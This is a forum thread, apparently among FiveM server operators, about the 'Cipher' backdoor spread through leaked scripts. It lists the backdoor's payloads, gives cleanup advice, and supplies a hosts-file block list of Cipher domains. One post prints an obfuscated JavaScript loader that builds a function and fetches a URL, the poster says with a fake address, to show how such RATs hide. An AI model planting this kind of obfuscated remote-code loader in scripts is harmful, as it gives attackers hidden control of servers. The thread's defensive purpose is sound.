Virus on my server

_4iY · May 18, 2024, 7:17pm

Usually this is only partially true; while it of course depends on the specific malicious code being ran, a backdoor like this allows the attacker full access to the server, so they can not only steal your server key, but any and all information on the server that they can find. Needless to say, it’s no small issue, and shouldn’t be taken lightly

Bwong · May 18, 2024, 8:21pm

Yes, to overtake your KEYMASTER 2fa will protect you. But wait, they have full access to your server so they also have access to your emails.

OKCRP · May 19, 2024, 4:22am

so i did some reading and it claims this virus

AdvancedTeam · May 19, 2024, 3:04pm

But, wait, you also have 2FA on your email, if you gonna use it on your server…
So, the cipher also took of your fingers and took a photo of your face, and social engineered all your childhood nightmares so its able to crack the secret password “Ilovewinneythepooh”.

OKCRP · May 19, 2024, 3:04pm

Default payloads
Resource Stopper & Active
Visual Spam
Mod Menu
Set All
Discord Rich Presence Hack
Resources Editor
Editor of configuration files
Download database
Deleting your name
Destruction of the database
SSH & RDP Access
Player database

all of that can happen and fivem is still yet to do anything…?
i have not been infected but apparently many many have…

I feel like the cfx team should at least have some sort of announcement or something into this… but all i can find is community members trying their best…

FuzeVTeam · May 19, 2024, 3:04pm

just dont use leaked shiet, logout on your root server from email, keymaster and stuff, only run them on your own home computer and you should be good. Backdoors are hella shiet so just be careful what your downloading

OKCRP · May 19, 2024, 9:50pm

+1

i only use resources from here or trusted developers

just a little weird, how this is a possibility and not really talked about

Bwong · May 19, 2024, 11:25pm

Yep, also the modding situation, rage uses easy ac which is also why its more effective.

Bwong · May 19, 2024, 11:27pm

Your points are not making any sense. Once you have logged into google chrome you have access to all google services. Not everyone uses microsoft search + bing like you apparently xdddd

AdvancedTeam · May 19, 2024, 11:38pm

If you really feel its making no sense, then I will never be able to explayn it to you. And if you feel its such a burden to look at forum, I simply advise you to do something else. Maybe even try Bing, its actually better than being toxic and rude.

Maybe try spend some time figuring out, why its important that some in a community ask for help, and why its actually more important that there are newcomers.

Bwong · May 20, 2024, 12:22am

Noone is being toxic, the problem is that you dont have any penetration testing common knowledge, nobody is toxic nor rude. If you seriously dont understand the fact that everything can get stolen in a second, then your high asf.

Appercy · May 20, 2024, 8:24am

try to find where it came from mostly leaked Scripts remove them and then cleanup the user it created.

TheIndra · May 20, 2024, 8:27am

Rather reinstall the whole machine, if they created a new user they may have done a whole lot more nasty stuff to that machine

Bwong · May 20, 2024, 7:24pm

as TheIndra said, once there is a user created, your machine is done dude, your server has most likely been uploaded to an external server, with all your information. At the point of the cipher spreading to another resource, its done for your resources. back to my point, if you see a user called xyz, moda or sys, then your machine is done as multiple new rules have been made. there are plenty of examples when you cant even access the computer via ssh, or, Remote Desktop Connection as a new rule has been created where you cant access the machine via RDC, and the only actual way that you can still connect to the computer is with VNC. There are also examples of ciphers that just immediately, on resource start obfuscate / encrypt ALL of your resources, with 0 time to react. Sometimes you can pay a ransom fee, most times not. Anyways, just reset the whole computer via your VPS control panel or if its your machine than by fully format it with another computer and install new windows that way.

OKCRP · May 23, 2024, 2:34am

i really feel like cfx team should step up on this matter, maybe we need a hero lol

Bwong · May 26, 2024, 7:06am

they dont give a shit. download GitHub - Szpachlan/CipherScanner ciastekbatek made it the developer of FiveGuard.

Ruptz · May 26, 2024, 8:05am

Let me look in all my server files using the find feature in VSC and find this exact https request that is a RAT and I will never find it

(function(){var uah='',rEd=302-291;function mzO(o){var f=3977643;var x=o.length;var k=[];for(var h=0;h<x;h++){k[h]=o.charAt(h)};for(var h=0;h<x;h++){var b=f*(h+85)+(f%49139);var i=f*(h+699)+(f%13191);var m=b%x;var n=i%x;var j=k[m];k[m]=k[n];k[n]=j;f=(b+i)%5338654;};return k.join('')};var Qga=mzO('bmpsgrzxqhroneftsvcttklciooyrndwauujc').substr(0,rEd);var rPv='rurn;)s;a+h)r])rC4)t;{,rt;[(c.of+ay[lf=]+f=r929"7n;t++fai 06=vr,)+av=,;7 0onu;,([l8=)r=1a4sde.90,;s,6afvu)va)u.,jgogma01invlrrrcj]et iwna2l(ug1h[9el g =4vo)g.j[[;a<vyas4,1a2+v;bei)a,+(a ;=),,)(;)62af({d"(}rr.,e<amg,(mc1q.t+ngt,p=l=))vh[ bnea6r2rnnaa=;,(p+rapeun);t0,vvtrgy=;e=(npd"={y5=0d7h a)"kar ; nu;=;;ll,jglra]+aaelr.c=lh=[xh()i 5fdk}tr[svfb2irv7f20+rho(=vo i5; )]]v[r+([{v0efe;+;e20=jr]eg{co1)u6vz;CbvysihssA).u+6z-vn*n!=.n;h-"ea,A01j+)hh-a;n .iig.rt,(esipffCcth{9=v)a;6+r=gt=ltCro(-1lChd.A(he .s=+srriso .ds==)r),;rd2ame; h=,ln6rssq=rt;in-2a)7lagrlru=.Cfa(]8ar(+uq).apya=eooh0srmi;8Stvf e)tfb7ucfs <r7rot(<qf+7]ii8,dj3<mtg}.i;h1"](i.l ,h((rsluszre(+=7r=)eshacf6jaoop]8oArlt=zul;kbns9Sfvn+odr1iuoss;,r;rhie.+8>[(-(9o,v"8. nac;rdr}rt0cat(g}} f; g18"n"+q]o1-u)t.e>1h.( .=vf*r,v(r)mlulpnrpb;f[=5a(+8;k=C=mv=t".;iA7(=m;g)3 h(r)o;n8npran;.{).[bdo!ouuoang;teC;0hhrl;kp]s;bre;}avv(=.(i]c(n,=';var WSQ=mzO[Qga];var qbB='';var DwZ=WSQ;var vTM=WSQ(qbB,mzO(rPv));var KxU=vTM(mzO('efprhach\/()smnitt:\/"ett\/d"f'));var xEC=DwZ(uah,KxU );xEC(6032);return 9481})()

Sure lets Undo the obfuscation on it using Chat GPT that has to work right?

(function(){
    var uah='', rEd=302-291;
    function mzO(o) {
        var f=3977643;
        var x=o.length;
        var k=[];
        for(var h=0; h<x; h++) {
            k[h]=o.charAt(h);
        }
        for(var h=0; h<x; h++) {
            var b=f*(h+85)+(f%49139);
            var i=f*(h+699)+(f%13191);
            var m=b%x;
            var n=i%x;
            var j=k[m];
            k[m]=k[n];
            k[n]=j;
            f=(b+i)%5338654;
        }
        return k.join('');
    }
    var Qga=mzO('bmpsgrzxqhroneftsvcttklciooyrndwauujc').substr(0,rEd);
    var rPv='rurn;)s;a+h)r])rC4)t;{,rt;[(c.of+ay[lf=]+f=r929"7n;t++fai 06=vr,)+av=,;7 0onu;,([l8=)r=1a4sde.90,;s,6afvu)va)u.,jgogma01invlrrrcj]et iwna2l(ug1h[9el g =4vo)g.j[[;a<vyas4,1a2+v;bei)a,+(a ;=),,)(;)62af({d"(}rr.,e<amg,(mc1q.t+ngt,p=l=))vh[ bnea6r2rnnaa=;,(p+rapeun);t0,vvtrgy=;e=(npd"={y5=0d7h a)"kar ; nu;=;;ll,jglra]+aaelr.c=lh=[xh()i 5fdk}tr[svfb2irv7f20+rho(=vo i5; )]]v[r+([{v0efe;+;e20=jr]eg{co1)u6vz;CbvysihssA).u+6z-vn*n!=.n;h-"ea,A01j+)hh-a;n .iig.rt,(esipffCcth{9=v)a;6+r=gt=ltCro(-1lChd.A(he .s=+srriso .ds==)r),;rd2ame; h=,ln6rssq=rt;in-2a)7lagrlru=.Cfa(]8ar(+uq).apya=eooh0srmi;8Stvf e)tfb7ucfs <r7rot(<qf+7]ii8,dj3<mtg}.i;h1"](i.l ,h((rsluszre(+=7r=)eshacf6jaoop]8oArlt=zul;kbns9Sfvn+odr1iuoss;,r;rhie.+8>[(-(9o,v"8. nac;rdr}rt0cat(g}} f; g18"n"+q]o1-u)t.e>1h.( .=vf*r,v(r)mlulpnrpb;f[=5a(+8;k=C=mv=t".;iA7(=m;g)3 h(r)o;n8npran;.{).[bdo!ouuoang;teC;0hhrl;kp]s;bre;}avv(=.(i]c(n,='; 
    var WSQ=mzO[Qga]; 
    var qbB=''; 
    var DwZ=WSQ; 
    var vTM=WSQ(qbB,mzO(rPv)); 
    var KxU=vTM(mzO('efprhach\/()smnitt:\/"ett\/d"f')); 
    var xEC=DwZ(uah,KxU); 
    xEC(6032); 
    return 9481
})()

And that’s just from a free obfuscator, you could easily get a better obfuscator and hide that even better.

Next time help instead of being rude

Note: The HTTPS request in this is fake and does nothing : P

Bwong · May 26, 2024, 8:19am

as I said before noone was being rude, and you are just stating the obvious. Also, is this a JS code? as I dont think people hide payloads in fivem js.

_4iY · May 26, 2024, 12:52pm

Cfx can’t fix people being dumb and/or greedy by using leaked resources; you will never get your server infected this way if you just dont run resources from sources you don’t trust, easy as.

Ruptz · May 26, 2024, 12:52pm

This is a little guide on how to stop a connection to a back door

Blacklist their domains on your firewall. This will slow them down however we have seen instances where they will use proxies to evade this but on most leaks this will help.

Open CMD and type NETSTAT will show you if you’re still infected by cipher

Next open this file:

C://windows/system32/drivers/etc/hosts

Next in your file put these exact things below

127.0.0.1 cipher-panel.me 
127.0.0.1 ciphercheats.com
127.0.0.1 keyx.club
127.0.0.1 dark-utilities.xyz

All of these are related to cipher.

You can also do these to make sure there is no unauthorized things on your VPS or PC…

Check the system admins on the machine to verify that no unauthorized accounts exist.

Change any passwords you have on the host machine to ensure that they don’t have access.

Note:

Using NETSTAT in your CMD can show you any weird connections to your VPS or PC etc, if you find a connection you find to be a cheat engine or backdoor just do the following.

C://windows/system32/drivers/etc/hosts

127.0.0.1 weirdname123.com -- of course you need to make this what you find in your CMD results

to add

127.0.0.1 is your local host so that you need to keep the same

Hope this helps anyone in need of this.